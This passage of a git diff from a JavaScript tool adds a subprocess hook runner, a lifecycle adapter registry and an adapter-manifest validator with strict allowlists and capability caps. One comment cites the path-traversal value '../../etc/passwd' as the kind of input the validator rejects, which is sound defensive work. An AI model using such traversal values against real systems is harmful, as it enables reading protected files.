+  const raced = await raceTimeout(closeResult, effectiveTimeoutMs);
+  if (raced === TIMEOUT_SENTINEL) {
+    await killGroup(child);
+    await raceTimeout(closeResult, KILL_GRACE_MS); // best-effort; result unused
+    return {
+      ok: false,
+      exitCode: null,
+      stdout: mergeCapture(
+        { text: stdoutCollector.text(), truncated: stdoutCollector.wasTruncated() },
+        { text: stderrCollector.text(), truncated: stderrCollector.wasTruncated() },
+      ),
+      detail: `${hostId}:${verb} adapter hook timed out after ${effectiveTimeoutMs}ms and was killed`,
+    };
+  }
+
+  if (spawnError) {
+    return { ok: false, stdout: '', exitCode: null, detail: describeFailure(hostId, verb, spawnError) };
+  }
+
+  const { code } = raced;
+  const stdout = mergeCapture(
+    { text: stdoutCollector.text(), truncated: stdoutCollector.wasTruncated() },
+    { text: stderrCollector.text(), truncated: stderrCollector.wasTruncated() },
+  );
+  return code === 0
+    ? { ok: true, stdout, exitCode: 0, detail: null }
+    : { ok: false, stdout, exitCode: code, detail: `${hostId}:${verb} adapter hook exited with code ${code}` };
+}

--- a/src/lib/adapters/index.mjs
+++ b/src/lib/adapters/index.mjs
@@ -6,3 +6,6 @@ export * from './migration.mjs';
 export * from './lifecycle.mjs';
 export * from './config.mjs';
 export * from './ownership.mjs';
+export * from './manifest.mjs';
+export * from './admission.mjs';
+export * from './admitted.mjs';

--- a/src/lib/adapters/lifecycle-registry.mjs
+++ b/src/lib/adapters/lifecycle-registry.mjs
@@ -1,0 +1,63 @@
+// Lifecycle adapter registry — host lifecycle (detect/plan/apply/verify/undo)
+// reached by id lookup, never by a named import of a concrete host module.
+//
+// Lifecycle adapters carry FUNCTIONS (detect/plan/apply/verify/undo), so they
+// cannot live in the structuredClone'd data registry (registries.mjs) — this
+// module is the function-carrying sibling, keyed the same way (host id).
+//
+// Direction: this module imports the concrete OPENCODE_LIFECYCLE_ADAPTER from
+// opencode.mjs and registers it here, rather than opencode.mjs importing this
+// module and self-registering. opencode.mjs already imports from
+// adapters/config.mjs today, but nothing under adapters/ imports opencode.mjs
+// — so this is a new, one-way edge (adapters/* -> opencode.mjs) that never
+// cycles back (opencode.mjs has no reason to import this module: callers
+// reach it through lifecycleAdapterFor/hostsWithLifecycle instead).
+import { validateLifecycleAdapter } from './lifecycle.mjs';
+import { HOST_REGISTRY } from './registries.mjs';
+import { OPENCODE_LIFECYCLE_ADAPTER } from '../opencode.mjs';
+
+const LIFECYCLE_ADAPTERS = new Map();
+
+/**
+ * Register a built-in host's lifecycle adapter. Internal — called by this
+ * module itself, once per built-in, at import time. There is no dynamic or
+ * third-party host concept yet, so this is not a general-purpose plugin API.
+ *
+ * Throws when the host id isn't in HOST_REGISTRY or the adapter doesn't
+ * satisfy validateLifecycleAdapter: a wiring bug in a built-in is a load-time
+ * fault, not a runtime one. `hostRegistry` is overridable so this invariant
+ * is unit-testable directly (a synthetic registry) without needing a
+ * fresh-module import trick.
+ * @param {string} hostId
+ * @param {any} adapter — shape enforced by validateLifecycleAdapter, not the type system
+ * @param {{ hostRegistry?: ReadonlyArray<{id: string}> }} [opts]
+ * @returns {any}
+ */
+export function registerBuiltinLifecycle(hostId, adapter, { hostRegistry = HOST_REGISTRY } = {}) {
+  if (!hostRegistry.some((host) => host.id === hostId)) {
+    throw new TypeError(`lifecycle registry: unknown host id '${hostId}' — not present in HOST_REGISTRY`);
+  }
+  validateLifecycleAdapter(adapter);
+  LIFECYCLE_ADAPTERS.set(hostId, adapter);
+  return adapter;
+}
+
+registerBuiltinLifecycle('opencode', OPENCODE_LIFECYCLE_ADAPTER);
+
+/**
+ * @param {string} hostId
+ * @returns {any|null}|null}
+ */
+export function lifecycleAdapterFor(hostId) {
+  return LIFECYCLE_ADAPTERS.get(hostId) ?? null;
+}
+
+/**
+ * Host ids with a registered lifecycle adapter, in HOST_REGISTRY order (not
+ * Map-insertion order) so callers get a deterministic, registry-driven
+ * iteration order as more hosts gain lifecycle adapters.
+ * @returns {string[]}
+ */
+export function hostsWithLifecycle() {
+  return HOST_REGISTRY.filter((host) => LIFECYCLE_ADAPTERS.has(host.id)).map((host) => host.id);
+}

--- a/src/lib/adapters/lifecycle-registry.mjs
+++ b/src/lib/adapters/lifecycle-registry.mjs
@@ -12,8 +12,9 @@
 // — so this is a new, one-way edge (adapters/* -> opencode.mjs) that never
 // cycles back (opencode.mjs has no reason to import this module: callers
 // reach it through lifecycleAdapterFor/hostsWithLifecycle instead).
-import { validateLifecycleAdapter } from './lifecycle.mjs';
+import { validateLifecycleAdapter, LIFECYCLE_OPERATIONS, lifecycleResult } from './lifecycle.mjs';
 import { HOST_REGISTRY } from './registries.mjs';
+import { effectiveHostRegistry } from './admitted.mjs';
 import { OPENCODE_LIFECYCLE_ADAPTER } from '../opencode.mjs';
 
 const LIFECYCLE_ADAPTERS = new Map();
@@ -53,11 +54,126 @@ export function lifecycleAdapterFor(hostId) {
 }
 
 /**
- * Host ids with a registered lifecycle adapter, in HOST_REGISTRY order (not
- * Map-insertion order) so callers get a deterministic, registry-driven
- * iteration order as more hosts gain lifecycle adapters.
+ * Host ids with a registered lifecycle adapter, in effectiveHostRegistry
+ * order (HOST_REGISTRY plus any admitted externals — not Map-insertion
+ * order) so callers get a deterministic, registry-driven iteration order.
+ * With nothing admitted, effectiveHostRegistry() === HOST_REGISTRY (same
+ * reference), so this is unchanged from the built-ins-only behavior.
  * @returns {string[]}
  */
 export function hostsWithLifecycle() {
+  return effectiveHostRegistry().filter((host) => LIFECYCLE_ADAPTERS.has(host.id)).map((host) => host.id);
+}
+
+/**
+ * Host ids with a registered lifecycle adapter, restricted to BUILT-IN hosts
+ * (LIFECYCLE_ADAPTERS keys intersected with HOST_REGISTRY — never an
+ * admitted external, even after applyAdmitted). setup.mjs/sync.mjs/
+ * uninstall.mjs's lifecycle loops destructure an opencode-SHAPED result
+ * (stack.oc/.plugin/.agents/.skill, ret.undo/.artifacts) — those loop bodies
+ * are not generic across hosts yet. Today that's unreachable dead code,
+ * because registerAdmittedLifecycle is never called in production — but it
+ * is ARMED: the moment something wires an admitted external's lifecycle
+ * adapter in (registerAdmittedLifecycle exists for exactly that), a
+ * non-opencode-shaped host would enter hostsWithLifecycle() and crash one of
+ * those command loops on the first opencode-specific destructure. Command
+ * loops use this function instead until external lifecycle EXECUTION and a
+ * shape-agnostic loop body graduate together, in a later wave.
+ * hostsWithLifecycle() above stays for pure registry queries, unaffected.
+ * @returns {string[]}
+ */
+export function builtinHostsWithLifecycle() {
   return HOST_REGISTRY.filter((host) => LIFECYCLE_ADAPTERS.has(host.id)).map((host) => host.id);
+}
+
+// ── admitted (external) lifecycle adapters ─────────────────────────────────
+// A derived adapter never runs third-party code in-process: each declared
+// verb is a thin wrapper that shells out through the sibling's hook runner
+// (runAdapterHook({hook, hostId, verb, timeoutMs, env}) -> {ok, stdout,
+// exitCode, detail}) and interprets stdout as the JSON payload for that verb
+// (e.g. a detect hook prints `{"observed": {...}}`) — the declarative-
+// manifest + subprocess-hooks contract the dossier settled on. A verb the
+// manifest never declared gets an honest no-op: it never ran, so nothing
+// changed.
+
+function parseHookPayload(result) {
+  if (!result || typeof result.stdout !== 'string') return null;
+  try {
+    const parsed = JSON.parse(result.stdout);
+    return parsed && typeof parsed === 'object' && !Array.isArray(parsed) ? parsed : null;
+  } catch {
+    return null;
+  }
+}
+
+function hookFailureResult(verb, result) {
+  const detail = result?.detail || (result?.stdout || '').trim() || `hook exited ${result?.exitCode ?? 'unknown'}`;
+  if (verb === 'detect' || verb === 'verify') return { observed: null, error: detail };
+  if (verb === 'plan') return { changed: false, operations: [], error: detail };
+  return lifecycleResult({ ok: false, changed: false, errors: [detail] });
+}
+
+/**
+ * Build a five-verb lifecycle adapter for an admitted manifest. Declared
+ * verbs (manifest.lifecycle[verb]) run through the hook runner; undeclared
+ * verbs are honest no-ops satisfying validateLifecycleAdapter's function-per-
+ * verb contract without fabricating a result. `runHook` is injectable —
+ * defaults to a dynamic import of ./hook-runner.mjs (the sibling module),
+ * fetched lazily so this factory (and this whole file) loads cleanly even
+ * before that module exists, and so tests never pay for the import unless
+ * they omit the injection on purpose.
+ * @param {any} manifest — validateAdapterManifest's return shape
+ * @param {{ runHook?: (args: any) => Promise<{ok:boolean, stdout:string, exitCode:number}> }} [opts]
+ */
+export function buildAdmittedLifecycleAdapter(manifest, { runHook } = {}) {
+  const hostId = manifest.host.id;
+  const declared = manifest.lifecycle ?? {};
+  const adapter = { id: hostId };
+  for (const verb of LIFECYCLE_OPERATIONS) {
+    const hookEntry = declared[verb]?.hook;
+    if (!hookEntry) {
+      adapter[verb] = async () => lifecycleResult({ ok: true, changed: false, facts: null });
+      continue;
+    }
+    adapter[verb] = async (context = {}) => {
+      const run = runHook ?? (await import('./hook-runner.mjs')).runAdapterHook;
+      const result = await run({
+        hook: hookEntry, hostId, verb, timeoutMs: hookEntry.timeoutMs, env: context.env,
+      });
+      if (!result?.ok) return hookFailureResult(verb, result);
+      const payload = parseHookPayload(result);
+      if (payload === null) return hookFailureResult(verb, result);
+      return verb === 'apply' || verb === 'undo' ? lifecycleResult(payload) : payload;
+    };
+  }
+  return adapter;
+}
+
+/**
+ * Register an admitted external manifest's derived lifecycle adapter. Unlike
+ * registerBuiltinLifecycle, this checks the host id against
+ * effectiveHostRegistry() (built-ins + admitted) rather than HOST_REGISTRY —
+ * an admitted-but-not-yet-overlaid host id would otherwise never pass the
+ * built-ins-only check.
+ *
+ * Not called anywhere in production yet: registering an external host here
+ * makes it appear in hostsWithLifecycle() (registry-query, all hosts), but
+ * setup.mjs/sync.mjs/uninstall.mjs deliberately read builtinHostsWithLifecycle()
+ * instead, which stays built-ins-only. External lifecycle EXECUTION and a
+ * shape-agnostic command-loop body (today's loops assume the opencode result
+ * shape) graduate together, in a later wave — wiring a real caller for this
+ * function ahead of that loop-body rewrite would crash setup/sync/uninstall
+ * the moment a non-opencode-shaped host is admitted.
+ * @param {any} manifest
+ * @param {{ runHook?: (args: any) => Promise<any> }} [opts]
+ */
+export function registerAdmittedLifecycle(manifest, { runHook } = {}) {
+  const hostId = manifest.host.id;
+  if (!effectiveHostRegistry().some((host) => host.id === hostId)) {
+    throw new TypeError(`lifecycle registry: unknown host id '${hostId}' — not present in effectiveHostRegistry`);
+  }
+  const adapter = buildAdmittedLifecycleAdapter(manifest, { runHook });
+  validateLifecycleAdapter(adapter);
+  LIFECYCLE_ADAPTERS.set(hostId, adapter);
+  return adapter;
 }

--- a/src/lib/adapters/manifest.mjs
+++ b/src/lib/adapters/manifest.mjs
@@ -1,0 +1,302 @@
+// Adapter-manifest schema + validator (Adapter Contract Dossier: an external
+// host adapter is DATA plus consented subprocess hooks — no third-party code
+// ever runs in-process). validateAdapterManifest is the STRUCTURAL cap layer:
+// an ineligible claim (canBePrimary, an aqeProvider binding, a command
+// statusline, a path-traversal guidanceFile) must be INEXPRESSIBLE by a
+// manifest that parses at all, not merely refused later at runtime. Every
+// rejection carries a named `.reason` (ManifestRejected#reason) so admission.mjs
+// and its tests can distinguish failure modes without parsing message text.
+import {
+  assertEnum, assertId, assertRecord, assertStringArray, immutable,
+} from './schema.mjs';
+import { validateHostAdapter, HOST_REGISTRY, PROJECTION_REGISTRY, OBSERVABILITY_REGISTRY } from './registries.mjs';
+import { LIFECYCLE_OPERATIONS } from './lifecycle.mjs';
+
+const SEMVER_RE = /^\d+\.\d+\.\d+(?:-[0-9A-Za-z-.]+)?(?:\+[0-9A-Za-z-.]+)?$/;
+
+export const DRIVING_SURFACES = Object.freeze(['cli-subprocess', 'acp', 'mcp']);
+
+// manifest.trust has a lighter shape than host.trust ({ changes: [...] }, no
+// approvalPolicy) — see the Wave 4 final report for why this is a local,
+// manifest-scoped enum rather than an extension of registries.mjs's
+// TRUST_CHANGE_KINDS: every entry in a manifest's trust.changes is, by
+// construction, a third-party-adapter-sourced grant, so one kind suffices
+// today and registries.mjs stays untouched.
+export const MANIFEST_TRUST_KINDS = Object.freeze(['third-party-adapter']);
+const MANIFEST_TRUST_SCOPES = Object.freeze(['project', 'user']);
+
+export class ManifestRejected extends TypeError {
+  constructor(reason, detail) {
+    super(detail ? `${reason}: ${detail}` : reason);
+    this.name = 'ManifestRejected';
+    this.reason = reason;
+  }
+}
+
+// ── strict allowlists (Wave 4 security remediation, P0-A) ──────────────────
+// Consent hashes the VALIDATED manifest (see hashManifest in admission.mjs),
+// not the operator's raw file. Before this allowlist, an unrecognized
+// TOP-LEVEL key was silently dropped (not rejected) before hashing — so
+// hashManifest(manifest) and the operator's reviewed file could diverge in
+// meaning while still hashing identically, and a recorded consent would
+// cover content the operator never saw. Nested extras under host/
+// host.install/host.legacy fared worse: those sub-validators structuredClone
+// the ENTIRE input object (registries.mjs's validateHostAdapter has no
+// allowlist of its own — built-ins must keep working through it unchanged),
+// so an unrecognized nested key survived verbatim into the admitted host
+// entry and effectiveHostRegistry(). That matters specifically for
+// host.install (a future installHost() runs `npm install -g ${host.pkg}` —
+// providers.mjs) and host.legacy (hosts.mjs/providers.mjs read enableEnv,
+// aqeProvider, guidanceFile, etc. for real env/file wiring). These lists are
+// exactly what those two downstream readers (registries.mjs's
+// validateHostAdapter, src/lib/hosts.mjs, src/lib/providers.mjs) consume —
+// widen them only alongside a new legitimate consumer, never speculatively.
+const MANIFEST_ALLOWED_KEYS = Object.freeze([
+  'name', 'version', 'contract', 'host', 'detection', 'driving', 'lifecycle', 'trust',
+]);
+// Everything validateHostAdapter itself reads (id, label, install,
+// capabilities, trust, enabledByDefault, configProjection, observability)
+// plus the two fields it structuredClones through untouched but that a real
+// downstream reader consumes: `auth` (src/lib/hosts.mjs's HOST_ADAPTERS
+// spreads host.auth for canDriveSession hosts) and `legacy` (this file's own
+// structural caps below, plus hosts.mjs/providers.mjs).
+const HOST_ALLOWED_KEYS = Object.freeze([
+  'id', 'label', 'install', 'capabilities', 'auth', 'legacy', 'trust', 'configProjection', 'observability', 'enabledByDefault',
+]);
+// bin + externalInstallPolicy are validated by validateHostAdapter;
+// npmPackage is read by providers.mjs (`HOSTS` -> `host.install.npmPackage`
+// -> `npm install -g <pkg>`) but never checked there — allowlisted here so
+// it round-trips for a BUILT-IN host, then explicitly forbidden below for an
+// EXTERNAL one (an adapter must never name a package ak would install).
+const HOST_INSTALL_ALLOWED_KEYS = Object.freeze(['bin', 'npmPackage', 'externalInstallPolicy']);
+// The legacy fields real built-in hosts carry and real readers consume:
+// guidanceFile/configFormat/statusline/aqeProvider/envMarkers (hosts.mjs's
+// HOST_ADAPTERS) and enableEnv (providers.mjs's HOSTS/commandHosts).
+const HOST_LEGACY_ALLOWED_KEYS = Object.freeze([
+  'guidanceFile', 'configFormat', 'statusline', 'aqeProvider', 'envMarkers', 'enableEnv',
+]);
+// The canonical host-capability names, derived from a built-in entry so this
+// can't drift from registries.mjs's private HOST_CAPABILITIES list.
+const HOST_CAPABILITY_KEYS = Object.freeze(Object.keys(HOST_REGISTRY[0].capabilities));
+
+/**
+ * Reject any own key of `value` not in `allowed`, named ManifestRejected
+ * ('unknown-field'). A non-plain-object `value` is left alone — the real
+ * structural validator downstream reports that shape error with its own
+ * (existing) reason, so this never masks e.g. "host must be an object".
+ * @param {any} value
+ * @param {readonly string[]} allowed
+ * @param {string} field — dotted path under 'manifest', e.g. 'host.install'; '' for the root
+ */
+function assertNoUnknownKeys(value, allowed, field) {
+  if (!value || typeof value !== 'object' || Array.isArray(value)) return;
+  const allowedSet = new Set(allowed);
+  for (const key of Object.keys(value)) {
+    if (!allowedSet.has(key)) {
+      const path = field ? `manifest.${field}` : 'manifest';
+      throw new ManifestRejected('unknown-field', `${path} has unknown key '${key}'`);
+    }
+  }
+}
+
+// Built from the exported REGISTRY arrays (not the private *_MAP objects
+// registries.mjs keeps internal) so this module needs no edit to
+// registries.mjs to reuse the same referential-integrity checks built-ins get.
+const projectionMap = Object.fromEntries(PROJECTION_REGISTRY.map((entry) => [entry.id, entry]));
+const observabilityMap = Object.fromEntries(OBSERVABILITY_REGISTRY.map((entry) => [entry.id, entry]));
+
+function validateDetection(value) {
+  assertRecord(value, 'detection');
+  assertNoUnknownKeys(value, ['bin', 'versionArgs', 'versionPattern'], 'detection');
+  try {
+    assertId(value.bin, 'detection.bin');
+  } catch (error) {
+    throw new ManifestRejected('invalid-detection', error.message);
+  }
+  if (value.versionArgs !== undefined) {
+    try {
+      assertStringArray(value.versionArgs, 'detection.versionArgs');
+    } catch (error) {
+      throw new ManifestRejected('invalid-detection', error.message);
+    }
+  }
+  if (value.versionPattern !== undefined) {
+    if (typeof value.versionPattern !== 'string' || !value.versionPattern) {
+      throw new ManifestRejected('invalid-detection', 'detection.versionPattern must be a non-empty string');
+    }
+    try {
+      new RegExp(value.versionPattern); // validity probe only, never used to match here
+    } catch {
+      throw new ManifestRejected('invalid-detection', 'detection.versionPattern must be a valid regular expression source');
+    }
+  }
+  return structuredClone(value);
+}
+
+function validateDriving(value) {
+  assertRecord(value, 'driving');
+  assertNoUnknownKeys(value, ['surfaces'], 'driving');
+  try {
+    assertStringArray(value.surfaces, 'driving.surfaces', { allowEmpty: false });
+  } catch (error) {
+    throw new ManifestRejected('invalid-driving-surfaces', error.message);
+  }
+  for (const surface of value.surfaces) {
+    if (!DRIVING_SURFACES.includes(surface)) {
+      throw new ManifestRejected('invalid-driving-surfaces', `unknown driving surface: ${surface}`);
+    }
+  }
+  return structuredClone(value);
+}
+
+function validateManifestLifecycle(value) {
+  assertRecord(value, 'lifecycle');
+  for (const [verb, entry] of Object.entries(value)) {
+    if (!LIFECYCLE_OPERATIONS.includes(verb)) {
+      throw new ManifestRejected('invalid-lifecycle-verb', `unknown lifecycle verb: ${verb}`);
+    }
+    assertRecord(entry, `lifecycle.${verb}`);
+    assertNoUnknownKeys(entry, ['hook'], `lifecycle.${verb}`);
+    assertRecord(entry.hook, `lifecycle.${verb}.hook`);
+    assertNoUnknownKeys(entry.hook, ['command', 'timeoutMs'], `lifecycle.${verb}.hook`);
+    try {
+      assertStringArray(entry.hook.command, `lifecycle.${verb}.hook.command`, { allowEmpty: false });
+    } catch (error) {
+      throw new ManifestRejected('invalid-lifecycle-hook', error.message);
+    }
+    if (entry.hook.timeoutMs !== undefined
+      && (!Number.isInteger(entry.hook.timeoutMs) || entry.hook.timeoutMs <= 0)) {
+      throw new ManifestRejected('invalid-lifecycle-hook', `lifecycle.${verb}.hook.timeoutMs must be a positive integer`);
+    }
+  }
+  return structuredClone(value);
+}
+
+function validateManifestTrust(value) {
+  assertRecord(value, 'trust');
+  assertNoUnknownKeys(value, ['changes'], 'trust');
+  if (!Array.isArray(value.changes)) throw new ManifestRejected('invalid-trust', 'trust.changes must be an array');
+  const ids = new Set();
+  for (const [index, change] of value.changes.entries()) {
+    const field = `trust.changes[${index}]`;
+    // Unknown-key rejection stays OUTSIDE the catch so it keeps the uniform
+    // 'unknown-field' reason every other sub-structure uses, rather than being
+    // re-labeled 'invalid-trust'.
+    if (change && typeof change === 'object' && !Array.isArray(change)) {
+      assertNoUnknownKeys(change, ['id', 'kind', 'scope', 'owner', 'value', 'effect'], field);
+    }
+    try {
+      assertRecord(change, field);
+      assertId(change.id, `${field}.id`);
+    } catch (error) {
+      throw new ManifestRejected('invalid-trust', error.message);
+    }
+    if (ids.has(change.id)) throw new ManifestRejected('invalid-trust', `${field} duplicate id: ${change.id}`);
+    ids.add(change.id);
+    try {
+      assertEnum(change.kind, MANIFEST_TRUST_KINDS, `${field}.kind`);
+      assertEnum(change.scope, MANIFEST_TRUST_SCOPES, `${field}.scope`);
+      for (const name of ['owner', 'value', 'effect']) {
+        if (typeof change[name] !== 'string' || !change[name]) throw new TypeError(`${field}.${name} is required`);
+      }
+    } catch (error) {
+      throw new ManifestRejected('invalid-trust', error.message);
+    }
+  }
+  return structuredClone(value);
+}
+
+/**
+ * Validate one adapter manifest document. Throws ManifestRejected (a named
+ * `.reason`) on any structural or capability-cap violation; returns a frozen,
+ * fully independent copy on success. `projections`/`observability` are
+ * injectable for tests, defaulting to the real built-in registries.
+ */
+export function validateAdapterManifest(value, { projections = projectionMap, observability = observabilityMap } = {}) {
+  assertRecord(value, 'manifest');
+  assertNoUnknownKeys(value, MANIFEST_ALLOWED_KEYS, '');
+
+  try {
+    assertId(value.name, 'manifest.name');
+  } catch (error) {
+    throw new ManifestRejected('invalid-id', error.message);
+  }
+
+  if (typeof value.version !== 'string' || !SEMVER_RE.test(value.version)) {
+    throw new ManifestRejected('invalid-version', 'manifest.version must be semver (e.g. 1.2.3)');
+  }
+
+  if (!Number.isInteger(value.contract) || value.contract < 1) {
+    throw new ManifestRejected('invalid-contract', 'manifest.contract must be a positive integer');
+  }
+
+  // ── host-layer allowlist wrapper, BEFORE validateHostAdapter runs ──────
+  // validateHostAdapter is shared with the built-in registry (registries.mjs)
+  // and must keep structuredClone-ing whatever it's handed — so the
+  // allowlisting happens here, at the manifest (external-adapter-only) layer,
+  // never inside that shared validator.
+  if (value.host && typeof value.host === 'object' && !Array.isArray(value.host)) {
+    assertNoUnknownKeys(value.host, HOST_ALLOWED_KEYS, 'host');
+    if (value.host.install && typeof value.host.install === 'object' && !Array.isArray(value.host.install)) {
+      assertNoUnknownKeys(value.host.install, HOST_INSTALL_ALLOWED_KEYS, 'host.install');
+      if (value.host.install.npmPackage != null) {
+        throw new ManifestRejected('external-npm-package', 'external adapters may not declare host.install.npmPackage — detect-never-overwrite only');
+      }
+      try {
+        assertId(value.host.install.bin, 'host.install.bin');
+      } catch (error) {
+        throw new ManifestRejected('invalid-install-bin', error.message);
+      }
+    }
+    assertNoUnknownKeys(value.host.legacy, HOST_LEGACY_ALLOWED_KEYS, 'host.legacy');
+    // Capability keys are allowlisted to the canonical set too, so a
+    // differently-cased or extra key ('CanBePrimary', 'ADMIN') can't ride
+    // along inert — the cap-bypass surface is provably closed, not merely
+    // harmless because consumers happen to read the exact lowercase flag.
+    assertNoUnknownKeys(value.host.capabilities, HOST_CAPABILITY_KEYS, 'host.capabilities');
+  }
+
+  let host;
+  try {
+    host = validateHostAdapter(value.host, { projections, observability });
+  } catch (error) {
+    throw new ManifestRejected('invalid-host', error.message);
+  }
+
+  // ── structural caps: these claims must be INEXPRESSIBLE, not merely
+  // refused at runtime — an external manifest can never assert them true. ──
+  if (host.capabilities.canBePrimary === true) {
+    throw new ManifestRejected('cap-can-be-primary', 'external adapters may not claim host.capabilities.canBePrimary');
+  }
+  if (host.capabilities.commandStatusline === true) {
+    throw new ManifestRejected('cap-command-statusline', 'external adapters may not claim host.capabilities.commandStatusline');
+  }
+  if (host.legacy != null && host.legacy.aqeProvider != null) {
+    throw new ManifestRejected('cap-aqe-provider', 'external adapters may not claim host.legacy.aqeProvider');
+  }
+  // Wave-1 review's traversal finding, enforced at schema level: guidanceFile
+  // must be an id-shaped slug, never a path (`../../etc/passwd` fails assertId).
+  if (host.legacy != null && host.legacy.guidanceFile !== undefined) {
+    try {
+      assertId(host.legacy.guidanceFile, 'host.legacy.guidanceFile');
+    } catch (error) {
+      throw new ManifestRejected('invalid-guidance-file', error.message);
+    }
+  }
+
+  const detection = validateDetection(value.detection);
+  const driving = validateDriving(value.driving);
+  const lifecycle = value.lifecycle === undefined ? undefined : validateManifestLifecycle(value.lifecycle);
+  const trust = validateManifestTrust(value.trust);
+
+  return immutable({
+    name: value.name,
+    version: value.version,
+    contract: value.contract,
+    host,
+    detection,
+    driving,
+    ...(lifecycle === undefined ? {} : { lifecycle }),
+    trust,
+  });
+}

--- a/src/lib/adapters/registries.mjs
+++ b/src/lib/adapters/registries.mjs
@@ -225,22 +225,97 @@ const hostEntries = [
   },
 ];
 
+// F-28: was a tuple-array `.map` that derived capabilities by identity
+// comparison (`modelDiscovery: id === 'ollama'`, `pricing: id === 'ollama' ?
+// 'zero' : …`) — a construction that cannot express a second local provider
+// needing pricing 'zero' WITHOUT modelDiscovery (ADR-0028's local-openai).
+// Explicit per-entry records instead, matching the style hostEntries already
+// uses; the five pre-existing rows are pinned deep-equal in
+// tests/kit/adapter-registries.test.mjs so this rewrite cannot silently
+// change what ships.
 const providerEntries = [
-  ['anthropic', 'Anthropic', 'subscription', { kind: 'host-login' }, ['native'], ['claude'], []],
-  ['openai', 'OpenAI', 'subscription', { kind: 'host-login' }, ['native', 'openai-compatible'], ['codex'], []],
-  ['google', 'Google Gemini', 'metered', { kind: 'environment', env: ['GOOGLE_API_KEY', 'GEMINI_API_KEY'] }, ['native'], ['ruflo', 'aqe'], []],
-  ['openrouter', 'OpenRouter', 'metered', { kind: 'environment', env: ['OPENROUTER_API_KEY'] }, ['openai-compatible'], ['ruflo', 'aqe', 'claude', 'codex', 'opencode'], ['openrouter-metadata']],
-  ['ollama', 'Ollama', 'local', { kind: 'none' }, ['native', 'openai-compatible', 'anthropic-compatible'], ['ruflo', 'aqe', 'claude', 'codex', 'opencode'], ['ollama-catalog', 'ollama-runtime']],
-].map(([id, label, billing, credentials, transports, projections, observability]) => ({
-  id, label, billing, credentials, transports, projections, observability,
-  legacy: { apiProvider: id !== 'openrouter' },
-  capabilities: {
-    modelDiscovery: id === 'ollama', runtimeDiscovery: id === 'ollama',
-    pricing: id === 'ollama' ? 'zero' : (id === 'openrouter' ? 'dated-offline' : 'provider-specific'),
-    quota: id === 'anthropic' || id === 'openai',
-    cacheAccounting: id === 'ollama' ? 'unknown' : 'provider-dependent',
+  {
+    id: 'anthropic', label: 'Anthropic', billing: 'subscription',
+    credentials: { kind: 'host-login' }, transports: ['native'], projections: ['claude'], observability: [],
+    legacy: { apiProvider: true },
+    capabilities: {
+      modelDiscovery: false, runtimeDiscovery: false, pricing: 'provider-specific',
+      quota: true, cacheAccounting: 'provider-dependent',
+    },
   },
-}));
+  {
+    id: 'openai', label: 'OpenAI', billing: 'subscription',
+    credentials: { kind: 'host-login' }, transports: ['native', 'openai-compatible'], projections: ['codex'], observability: [],
+    legacy: { apiProvider: true },
+    capabilities: {
+      modelDiscovery: false, runtimeDiscovery: false, pricing: 'provider-specific',
+      quota: true, cacheAccounting: 'provider-dependent',
+    },
+  },
+  {
+    id: 'google', label: 'Google Gemini', billing: 'metered',
+    credentials: { kind: 'environment', env: ['GOOGLE_API_KEY', 'GEMINI_API_KEY'] },
+    transports: ['native'], projections: ['ruflo', 'aqe'], observability: [],
+    legacy: { apiProvider: true },
+    capabilities: {
+      modelDiscovery: false, runtimeDiscovery: false, pricing: 'provider-specific',
+      quota: false, cacheAccounting: 'provider-dependent',
+    },
+  },
+  {
+    id: 'openrouter', label: 'OpenRouter', billing: 'metered',
+    credentials: { kind: 'environment', env: ['OPENROUTER_API_KEY'] },
+    transports: ['openai-compatible'], projections: ['ruflo', 'aqe', 'claude', 'codex', 'opencode'],
+    observability: ['openrouter-metadata'],
+    // Unlike the other four, openrouter fronts many vendors' models behind one
+    // aggregator surface rather than being itself a single named vendor's API
+    // (F-28 dead-field trace: apiProviderIds() — the sole consumer — was
+    // removed in #100; the field is kept as honest metadata for any future
+    // reader, not for a live filter).
+    legacy: { apiProvider: false },
+    capabilities: {
+      modelDiscovery: false, runtimeDiscovery: false, pricing: 'dated-offline',
+      quota: false, cacheAccounting: 'provider-dependent',
+    },
+  },
+  {
+    id: 'ollama', label: 'Ollama', billing: 'local',
+    credentials: { kind: 'none' },
+    transports: ['native', 'openai-compatible', 'anthropic-compatible'],
+    projections: ['ruflo', 'aqe', 'claude', 'codex', 'opencode'],
+    observability: ['ollama-catalog', 'ollama-runtime'],
+    legacy: { apiProvider: true },
+    capabilities: {
+      modelDiscovery: true, runtimeDiscovery: true, pricing: 'zero',
+      quota: false, cacheAccounting: 'unknown',
+    },
+  },
+  // ADR-0028: one generic local provider for any OpenAI-compatible model
+  // server on loopback (MLX, LM Studio, llama.cpp, vLLM, user-named
+  // endpoints), instead of enumerating vendors.
+  {
+    id: 'local-openai', label: 'Local OpenAI-compatible', billing: 'local',
+    credentials: { kind: 'none' }, transports: ['openai-compatible'],
+    // No 'aqe' — ollama is an AQE provider type, local-openai deliberately is
+    // not (ADR-0028's stated asymmetry). No 'claude' — assertValidBinding
+    // gates a binding's projection through provider.projections, and
+    // claude's own configProjection ('claude') expects an
+    // anthropic-compatible surface; this row claims only openai-compatible,
+    // so 'claude' is absent by design, not by oversight.
+    projections: ['ruflo', 'codex', 'opencode'],
+    // No daemon API ak has verified for a generic endpoint (unlike ollama's
+    // catalog/runtime sources), so no observability sources.
+    observability: [],
+    // Same reasoning as openrouter above: a generic OpenAI-compatible proxy
+    // for an arbitrary user-run server is not itself a distinct named
+    // vendor's API.
+    legacy: { apiProvider: false },
+    capabilities: {
+      modelDiscovery: false, runtimeDiscovery: false, pricing: 'zero',
+      quota: false, cacheAccounting: 'unknown',
+    },
+  },
+];
 
 const HOST_MAP = registryFrom(hostEntries,
   (entry) => validateHostAdapter(entry, { projections: PROJECTION_MAP, observability: OBSERVABILITY_MAP }), 'host');

--- a/src/lib/blocks.mjs
+++ b/src/lib/blocks.mjs
@@ -19,6 +19,7 @@ import path from 'node:path';
 import { claudeDir, claudeMdPath, codexDir, opencodeDir, home } from './paths.mjs';
 import { have } from './exec.mjs';
 import { writeFileWithBackup } from './file-write.mjs';
+import { HOST_REGISTRY } from './adapters/index.mjs';
 
 export const BEGIN = (slug) => `<!-- BEGIN ${slug} -->`;
 export const END = (slug) => `<!-- END ${slug} -->`;
@@ -255,38 +256,104 @@ export function blocksForTarget(rows, targetName) {
  *  carries a detector that never fires (`{type:'retired'}` → detect() falls to
  *  its default false), so a present block is stripped and an absent one is a
  *  no-op — the original detector (e.g. a live `flag`) can never re-upsert it into
- *  a file it must stay out of. Absent from the file → nothing happens (no write). */
-export function retiredForTarget(rows, targetName) {
